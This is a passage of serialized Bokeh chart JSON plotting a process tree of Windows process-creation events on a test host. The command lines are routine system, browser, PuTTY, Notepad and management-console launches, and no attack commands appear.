id\":\"1652\"}}},\"id\":\"1654\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"1601\"},\"value\":1.75},\"id\":\"1628\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1730\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1741\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1651\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1652\"}}},\"id\":\"1655\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"ProcessTree (color bar = {legend_col})\"},\"id\":\"1599\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1744\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1643\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1644\"}}},\"id\":\"1647\",\"type\":\"Text\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1658\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"ClusterSize\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAM0AAAAAAAAAAQAAAAAAAAABAAAAAAAAA8D8AAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAIQAAAAAAAADJAAAAAAAAAMUAAAAAAAAAIQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAUQAAAAAAAABRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"CommandLine\":[\"nan\",\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 0000007c \",\"%SystemRoot%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\",\"winlogon.exe\",\"\\\"fontdrvhost.exe\\\"\",\"\\\"dwm.exe\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3fdc855 /state1:0x41c64e6d\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3a7d855 /state1:0x41c64e6d\",\"\\\"dwm.exe\\\"\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 3160 -s 1392\",\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"C:\\\\Windows\\\\Explorer.EXE\",\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\\\" \",\"\\\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE\\\" SCODEF:30680 CREDAT:82945 /prefetch:2\",\"\\\"C:\\\\Windows\\\\System32\\\\msiexec.exe\\\" /i \\\"C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\putty-64bit-0.70-installer.msi\\\" \",\"\\\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\\\" \",\"putty\",\"putty\",\"putty\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\SimulateAttack.cmd\",\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\system32\\\\CompMgmtLauncher.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\ServerManager.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\compmgmt.msc\\\" /s\",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\taskschd.msc\\\" /s\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2e2017\",\"0x106b46b\",\"0x3e7\",\"0x3e7\",\"0x2dca48\",\"0x2dca48\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2dca48\",\"0x3e7\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"EventID\":[\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\"],\"IsBranch\":[false,true,false,true,false,false,false,false,true,false,true,true,true,false,false,true,false,true,false,false,false,false,false,true,false,false,true,false,false,false],\"IsLeaf\":[false,false,true,false,true,true,true,true,false,true,false,false,false,true,true,false,true,false,true,true,true,true,true,false,true,true,false,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,4,4,4,4,4,5,4,5,6,7,7,6,7,7,8,6,6,6,6,6,7,6,6,7,6,6],\"NewProcessId\":[\"0x12c\",\"0x1384\",\"0x1354\",\"0x12ec\",\"0x7c6c\",\"0x2cac\",\"0x3470\",\"0xc7c\",\"0xc58\",\"0x75c4\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x6e04\",\"0x7ea8\",\"0x7084\",\"0x34a0\",\"0x752c\",\"0x7990\",\"0x6d30\",\"0x3820\",\"0x5f84\",\"0x61d0\",\"0x4878\",\"0x51fc\",\"0x18c4\",\"0x1758\",\"0x1784\",\"0x1470\",\"0xe8c\"],\"NewProcessId_par\":[\"NaN\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0xc58\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x77d8\",\"0xcb0\",\"0x7084\",\"0x7084\",\"0x752c\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0x4878\",\"0xcb0\",\"0xcb0\",\"0x1758\",\"0xcb0\",\"0xcb0\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\fontdrvhost.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\",\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\System32\\\\ServerManager.exe\",\"C:\\\\Windows\\\\System32\\\\mmc.exe\",\"C:\\\\Windows\\\\System32\\\\mmc.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\dwm.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\CompMgmtLauncher.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\"],\"ProcessId\":[\"NaN\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0x12ec\",\"0xc58\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0x77d8\",\"0x77d8\",\"0xcb0\",\"0x7084\",\"0x7084\",\"0x752c\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0xcb0\",\"0x4878\",\"0xcb0\",\"0xcb0\",\"0x1758\",\"0xcb0\",\"0xcb0\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x12c\",\"0x12c\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x1384\",\"0x12ec\",\"0x1384\",\"0x12ec\",\"0x89c\",\"0xcb0\",\"0xcb0\",\"0x89c\",\"0xcb0\",\"0xcb0\",\"0x7084\",\"0x89c\",\"0x89c\",\"0x89c\",\"0x89c\",\"0x89c\",\"0xcb0\",\"0x89c\",\"0x89c\",\"0xcb0\",\"0x89c\",\"0x89c\"],\"Rarity\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAADQPwAAAAAAANA/AAAAAAAA0D8AAAAAAADwP5qZmZmZmck/VVVVVVVVxT9VVVVVVVXFP5qZmZmZmck/KK+hvIbyqj8AAAAAAADgPwAAAAAAAOA/AAAAAAAA8D8AAAAAAADgPwAAAAAAAPA/AAAAAAAA8D9VVVVVVVXVP1VVVVVVVdU/VVVVVVVV1T9VVVVVVVXVP1VVVVVVVdU/VVVVVVVV1T9VVVVVVVXVPxzHcRzHcaw/Hh4eHh4erj9VVVVVVVXVPwAAAAAAAPA/VVVVVVVV1T+amZmZmZnJP5qZmZmZmck/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"Row\":[30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\",\"0x2e2017\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\"],\"TargetLogonId\":[\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x2e2017\",\"0x106b46b\",\"0x0\",\"0x0\",\"0x2dca48\",\"0x2dca48\",\"0x2e2017\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"NaN\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"/Knx0k1iQMMAECfYNY52QgDAKNg1jnZCAAAq2DWOdkIAsOAtO452QgCAo9w8jnZCANA+S6OOdkIA0EzYNY52QgAATdg1jnZCAACX3DyOdkIAMC7ZNY52QgCgM9k1jnZCAODPKTuOdkIA4N4pO452QgDQazc7jnZCAGAZPTuOdkIAINhUO452QgAgGOE8jnZCAFAH9T2OdkIAcHLkPI52QgBQQmE9jnZCAIA0wz2OdkIA0IrJPY52QgCAcKk+jnZCAJBxqT6OdkIA8MaIRY52QgBwjOU1jnZCAMCi5TWOdkIAsKXwNY52QgBwxIM2jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAECfYNY52QgDAKNg1jnZCAAAq2DWOdkIAsOAtO452QgCAo9w8jnZCANA+S6OOdkIA0EzYNY52QgAATdg1jnZCAACX3DyOdkIAMC7ZNY52QgCgM9k1jnZCAODPKTuOdkIA4N4pO452QgDQazc7jnZCAGAZPTuOdkIAINhUO452QgAgGOE8jnZCAFAH9T2OdkIAcHLkPI52QgBQQmE9jnZCAIA0wz2OdkIA0IrJPY52QgCAcKk+jnZCAJBxqT6OdkIA8MaIRY52QgBwjOU1jnZCAMCi5TWOdkIAsKXwNY52QgBwxIM2jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1938\",\"%%1936\",\"%%1936\",\"%%1938\",\"%%1938\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"__cmd_line$$\":[\"nan\",\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 0000007c \",\"%SystemRoot%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows Share...\",\"winlogon.exe\",\"\\\"fontdrvhost.exe\\\"\",\"\\\"dwm.exe\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3fdc855 /state1:0x41c64e6d\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3a7d855 /state1:0x41c64e6d\",\"\\\"dwm.exe\\\"\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 3160 -s 1392\",\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"C:\\\\Windows\\\\Explorer.EXE\",\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\\\" \",\"\\\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE\\\" SCODEF...\",\"\\\"C:\\\\Windows\\\\System32\\\\msiexec.exe\\\" /i \\\"C:\\\\Users\\\\MSTICAdmin\\\\Down...\",\"\\\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\\\" \",\"putty\",\"putty\",\"putty\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\WinBenignActi...\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagnostics\\\\SimulateAttac...\",\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\system32\\\\CompMgmtLauncher.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\ServerManager.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\compmgmt.ms...\",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\system32\\\\taskschd.ms...\"],\"__proc_id$$\":[\"PID: 0x12c\",\"PID: 0x1384\",\"PID: 0x1354\",\"PID: 0x12ec\",\"PID: 0x7c6c\",\"PID: 0x2cac\",\"PID: 0x3470\",\"PID: 0xc7c\",\"PID: 0xc58\",\"PID: 0x75c4\",\"PID: 0x89c\",\"PID: 